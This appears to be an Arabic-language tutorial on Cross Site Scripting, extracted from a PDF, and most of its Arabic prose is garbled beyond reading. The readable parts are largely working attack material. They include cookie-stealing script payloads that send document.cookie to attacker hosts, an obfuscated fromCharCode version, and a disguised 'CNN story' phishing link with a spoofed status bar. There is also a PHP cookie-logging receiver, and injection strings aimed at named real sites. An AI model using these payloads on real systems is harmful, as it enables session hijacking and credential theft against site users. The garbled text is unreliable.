Beruflich Dokumente
Kultur Dokumente
com/vb
AlQuRsAn Cross Site Scripting www. sfh.com/vb
CSS
2 )-_ 1 2 $ '/0( $0 > ^]XSS Z[ " \Cross Site Scripting
a W b c d '0OG /3 1 * e )- #@ 2 + . ` '6 @ I ( , +
<"U " 6j)* i WX iJ[ ( , + fWg h 3 ^=6 ` '6 @ !
.Z$?G WX k * lfWm T 3 B ! ... 6 @ 3O "
] 6jn c0 "\HEX f )* + e ` 'Q @ I E ;8> n c0 - ( $ o ,+ #@
. $ ( , + =< t u' v *" s I s" 1 / =lp qr+
!7)/ >O6 & e 2 ycl" s I01 2 $ '/0 /3 x8! I x 2 l ' )w
.@ I iJR W &[ 2 & uWX z< t s"
XSS CSS
Cascading ) L ' <| a I CSS WIX Cross Site Scripting {L Tt
q Y I . CSS WIX Z[ " { W Style Sheets
" ' 3 s~ . XSS WIX Cross Site Scripting z<nc -Y e N ,+ }
.XSS• 2 J uWX -
AlQuRsAn Cross Site Scripting www. sfh.com/vb
Cross Site TI =l<TP 0%l" XSS # JK2 > l" 4 $ ?" % € r<%l" Zr<
.• 6 Ic Scripting
XSS
" ActiveX " VBScript " Java Script @ ! ‚ O@< " $? I7 ) / n ! 4 ?" e
f ? ;Mv ! .=0 )w @ I W… ) / „... ƒ ,c Flash " HTML
„„„. I† ‡ˆ 6 3 ‰ " 8! I * 3 " =0@ <nJ0 " ( , +
‹Š )* + XSS o ,+ Z | , + # m 'Q @ !p
http://archives.neohapsis.com/archives/vuln- -
o 6Œ I† xDenial Of Servicex• 0 # m d$ [a )* + WX
.& $ + 3 " * ˆ ' ( , + r<)* - M•$
'XSS ! "#$%&
A + WX .PHPNuke X O Pc+ PHP A l e s I0XSS 2 JK #?
.A + WX ' c „.. I† ? %* e N V P + -Ž s I
‹A + W7 0)* + 2 ˆ '0OŒ } uWX
http://www.cgisecurity.com/archive/php/phpNuke_cross_site_scripting.txt
!"##!$! %
http://www.cgisecurity.com/archive !! !"##! %
.# ? i$VA + WX /J O$0 • l)* + uWX ( $0
8 92 7 3 4 56
‘ O I†s ! r< @ I Vi O $0)* + X ƒ &V<)* + e f 2 $ '/0e # J @g<
)* + M , + 8! I B o lO $l ’ Zr<.... " < 8! I ( , )* + ;8> p
.E iJR r<)* + 1 ? • Q 8! I B W6ylO $l “O WX
;-%+< : 4 56
Ic Pt0MI 1 0 } ' ‚ 2 O- 3Œ } XO- 3 ! e B ” XSS 2 JK
R h56 J Ic & Pt 3 Script 6 @@ ! 4 6@< ^s y o
& t N & - ( $ I7 1 g I IP > • s I0h 3 •P 9
P> W 0 2 J U 6" J # v " Java Script VR<‚ ’ — ^ @ Ic XO P–
. L Y )* + ;8> URL nvy0 6 @( , +
e 2 ˆ '0OŒ uWX .)* - O' 6Œ - ( $0MI [ + 2 ˆ '0OG } > 0 3"
)* + WX z<( , - 8! I B 3 0h 3 ( , + P iJ[ 3p
www.cgisecurity.com/cgi-bin/cookie.cgi
.( , + f Y 8! I W… 4 6 ) / 0s~ %l<^ PV8! I B Pt h 3
Java Script ( , 3˜ 8! I *
4
‹( 4
" š l<HEX • ™ ;8m e 1 / ASCII • 4 p ;8m e 1 / Š 4 + e
.. [V" # v ' +e @ !p
‹ ASCII ( , 3<
http://host/a.php?variable="><script>document.location='http://www.cgise
> curity.com/cgi-bin/cookie.cgi?'' (document.cookie</script
&
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹ HEX ( , 3<
* + ,' ' ' '- '. '- './'- '-0' '
.0'.1'. '-$'. '.$'. '-0' '. '.1'. '. '-0'./'.1'.
' ' -'.2'-0'-0'- ' ' 1' 1'--'--'--' '. '.-'./'
- '.$'. '-$'- './'-0'-/' '. '.1'. ' 1'. '.-'./'
'. './'. ' 1'. '.1'.1'.+'./'.$' '. '.-'./' 1' -'
' +'.0'.1'. '-$'. '.$'. '-0' '. '.1'.1'.+'./'.$'
' 1'- '. '- './'- '-0'
? => 2 #
My cookie = user=zeno; id=
My script = www.cgisecurity.com/cgi-bin/cookie.cgi
‹Š ! )* + z<1 / 3 h 3
GET /cgi-bin/cookie.cgi?user=zeno;' id=
)
AlQuRsAn Cross Site Scripting www. sfh.com/vb
XSS @ A&# 4 56
Pt0MI hexf @ I n c0 ˆ $ @ !p @ ! s~ ) 0‚ %l"
hex• c+ n6p @ I )R !y0E r Ec *% @ Ic N , -
.. " U " Œ 6 @( , -
• ,vp • I† I N • ,vp '* WX @ I h c ! T I†
.N@
= M v n¡ - %-* E l<( , + ¢?5 E r 8! I B * 3 T 4+e
Ic )* + 8! I B %* 3 - ( $ s ?p Tt e m I7 I
.s p u c WX ( , + '* ¢?5 n¡ ) 3
6
AlQuRsAn Cross Site Scripting www. sfh.com/vb
, B@C D 'E 4 56
e ˆ ? %l<z<% I z< 3 0— )- 2 + ^ # J '/ ( , > % / 3< r<
Websleuth u@" ( , 0) / 08! I E F%l<s~ cookie.cgi e X E *
.( , + f ? B /6 s I Œ s ! r<U
.. X 8! I * 3 I # + @g<E I•
http://www.idefense.com/XSS.html
>AF G )EH IJ
@ !p n c0 )R e A O " 'l
‹ z p # /Q
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
. <a> T3 % d '0O˜! & e @I R X
8
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹ l # /Q
q Y ... U 6" & z<=P> ( $ 3 =lp F V cI s I0 $ # /Q
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<
script>document.location.replace('http://attacker.com/ste
al.cgi?'+docum
ent.cookie);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
9
AlQuRsAn Cross Site Scripting www. sfh.com/vb
</html>
‹ MX @ I / 2 5 0 R"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/clinton.talkshow.reut/index.html';return
true"
onMouseOut="window.status='';return true"
. /+ & v '+ & T i $
‹ # /Q
...= " # X– 2 5 & !U & @ ! z< t ( , + I† Ic > 0 [ " X
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_p
age2.html?tw=<script>var u = String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0070);
u %2B= String.fromCharCode(0x003A);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0074);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x0065);
u %2B= String.fromCharCode(0x0072);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006F);
u %2B= String.fromCharCode(0x006D);
u %2B= String.fromCharCode(0x002F);
u %2B= String.fromCharCode(0x0068);
u %2B= String.fromCharCode(0x0061);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x006B);
u %2B= String.fromCharCode(0x002E);
u %2B= String.fromCharCode(0x0063);
u %2B= String.fromCharCode(0x0067);
u %2B= String.fromCharCode(0x0069);
:
AlQuRsAn Cross Site Scripting www. sfh.com/vb
u %2B= String.fromCharCode(0x003F);
u %2B= document.cookie;
document.location.replace(u);</script>"
onMouseOver="window.status='http://www.cnn.com/2002/SHOWB
IZ/News/05/02/
clinton.talkshow.reut/index.html';return true"
onMouseOut="window.status='';return true"> Check this CNN
story out!
</a>
</body>
</html>
‹ R
h Y @ !" nJ+ WX e R u €<=6 nJ V <script> R tw nJ+
• l I+
http://attacker.com/hack.cgi?'+document.cookie;
.h ? h ?
http
x .2 $ h
x -0 $ t
x -0 $ t
x - $ p
x A $ ‹
x F $ £
e u -$ R E r
document.location.replace(u);
.@ I )' 0 @ ƒ ,c 1 `•
KDL 4 B@ M /+
.... )R @ ! " '$0` • 2 nJ- # V - ( X1 '
‹4
xss.php P- l@ ! " W nJ php J & - ( $l
http://localhost/xss.php
;
AlQuRsAn Cross Site Scripting www. sfh.com/vb
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
if ( isset($code) )
echo stripslashes($code);
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
res.php P- l8! ! ¥c 0 &
http://localhost/res.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
Setcookie("myname" , "alqursan" , "time()+(3600");
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
cookies.php P- l8! I B T 0 &
http://localhost/cookies.php
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
<?
$data=$HTTP_COOKIE;
$fp = fopen("log.htm","a");
flock ($fp,2);
fputs ($fp,<BR>$data);
flock($fp,3);
fclose($fp);
?>
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
AlQuRsAn Cross Site Scripting www. sfh.com/vb
‹2 /Q
‹Š Ž z< $ 2 & |5 - ¦§P> e Mc0 " Vn3 E sI sd c
C:\apache\htdocs
..php T W E * z<2 + uWX )VO "
8! ! )R ‹ z p # /Q
.. & V<
http://localhost/res.php
AlQuRsAn Cross Site Scripting www. sfh.com/vb
.. & —
http://localhost/xss.php
) + e Š @ I 6@"
<script>document.location='http://localhost/cookies.php?'+document.cook
ie</script>
‹ & @ < T3< Š 1 !< "
?word=<script>document.location='http://localhost/cookies.php?'+docume
nt.cookie</script >
9N/) = A:= E0 )
s I 3 Z' ¡ ›p E #@ > + @ !¨ # V - T* ( , ><uWX y 0G /
. XSS
I† .¦ R P- 3< ?" r<E - " r©0 * XSS 2 JK !W0. > < z<> < n¡
.s B Ic E * 6 ‰ 0 E • § ” E W L # J uWX c I7
&<0 z<] \Z[ " Š # VE 1 g XSS ! c+ ! > < # V
. 1 0 &< 2 &< $ z<ª & Z[ " &<0
AlQuRsAn Cross Site Scripting www. sfh.com/vb
O P% -) = A:= E0 )
)* + = iJ[ @ + d '0OG )' 0i$VE lM- s" Z > P3 @ ( , % ! r<
e i WX I T* asfh.com «5 )* z<i O=V2 > )* 2 O§ r<. M •
. Ic+ uWX ® ¬- a h 3 WX & e i iJ[ s @E &
.E <e V + B + " E <%& V%l" r<# v ' W 0h 3 XSS Zl ?"
.= $ ;Mv " e 05V ' G ƒ ,v " V 0G ƒ ,v 3O %- 3 %l" r<
U )R .E & 2 @ < Java Script ¡" /Q WX E l -Y U 6" $ ˆ
. 0;Mv " ( Ic WX .8! I B %* 3 ) • WX high E & e -Y
XSS !Q .R 0 )
. #n'I )* + e @ > ( , 3Œ P3 ›p § I7 N 3 # Pv %' !<XSS 2 JK
.. n ! )* ¦ X
FBI.gov, CNN.com, Time.com, Ebay, Yahoo, Apple computer, Microsoft,
Zdnet, Wired, and Newsbytes
Pv ! #nPc 2 9 + e > 0. XSS 2 JK4 Iv" Iv )* + uWX !
)* ) 0x XO- 3 $ / ‘ v 7#Oc 3 clT XSS # JK°±¤¯- Z' $0
.x²O I
-U SSL SAT% D
)* + ^i$VT )* + 1 ˆ !y )* + } e s I *@ + 4 ! 0 WX ZG "
.4 ! 0 ³ WX ( , 0G )* + P ´ 80G SSL ( , 0
^ c+ 4 0G e s I+ H lW6y o ,+ ^ e -! ;Mc H l - 01 2 $ '/0
&
AlQuRsAn Cross Site Scripting www. sfh.com/vb
_4 NA, " ` *a IE 4 ^ bc _ 4( ^ !
http://www.microsoft.com/education/?ID=MCTN&target=http://www.mic
rosoft
com/education/?ID=MCTN&target="><script>alert(document.cookie)</sc
ript>
+ 3 2 3 % ! * ,5
ript>alert(‘Test’);</script>
http://www.shopnbc.com/listing.asp?qu=<script>alert(document.cookie)</
>@1 ,0@ , @ ,AABA@ , @ , @C ,
http://www.oracle.co.jp/mts_sem_owa/MTS_SEM/im_search_exe?search
_text"><script>alert"document.cookie</script>
<script>[code]</script>
‹ Xn¡ " @ !p ?y = ' 3<T
document.write(document.cookies)
alert('alqursan');
document.location='http://site/cookie.php*4
' ( 3
.# J H l Jc0( 3 '3 ! Zˆ v H
6 @s I0¶ i Oe #@ > s I0 I•G 2 & @ !" 6 @W 0@ !p WX }
.i$V2 & @ !"
8
AlQuRsAn Cross Site Scripting www. sfh.com/vb
? H G )3 %) H S ) ) A% HEX ( %8 L d , ^
EFGH
I JKLHI EFGH
I JKLHI
'$ P ' MN
OPK
'$ Q ' !
'$ R ' "
'$ S ' #
'$0 T ' 0 $
'$$ U ' $ %
'$. V ' . &
'$- W ' 2 (
'$2 X ' / )
'$/ Y ' Q *
'$Q Z ' R +
'$R [ ' " ,
'$" S ' T -
'$T ] ' 7 .
'$7 ^ ' 1 /
'$U _ '
'. ` '
'. a '
'. b '
'. c ' 0 0
'.0 d ' $ $
'.$ e ' . .
'.. f ' - -
'.- g ' 2 2
'.2 h ' / /
'./ i ' Q :
'.Q j ' R ;
'.B k ' " <
'." l ' T =
'.T m ' 7 >
'.7 n ' U ?
'.1 o '0 @
9
AlQuRsAn Cross Site Scripting www. sfh.com/vb
'- p %0 A
'- q %0 B
'- r %0 C
'- s %00 D
'-0 t %0$ E
'-$ u %0. F
'-. v %0- G
'-- w %02 H
'-2 x %0/ I
'-/ y '0Q J
'-Q z '0R K
'-R { '0" L
'-" | '0T M
'-T } '07 N
'-7 ~ '0U O
:
AlQuRsAn Cross Site Scripting www. sfh.com/vb
9^
xThe Cross Site Scripting FAQ x, ww.cgisecurity.com/articles/xss-faq.txt,
admin@cgisecurity.com
-h i
T Ÿ" #5 [V" =j -• l 3 · T " · WX
; ¹ l 0G N - + ) w + W… ) s" ¸ I · 4y3"
s $ 1 : T! 6"
‹ Š s z< 3O" t?5+ " O 3º
Alqursan_ @hotmail.com
1 0I – • o $Y ) w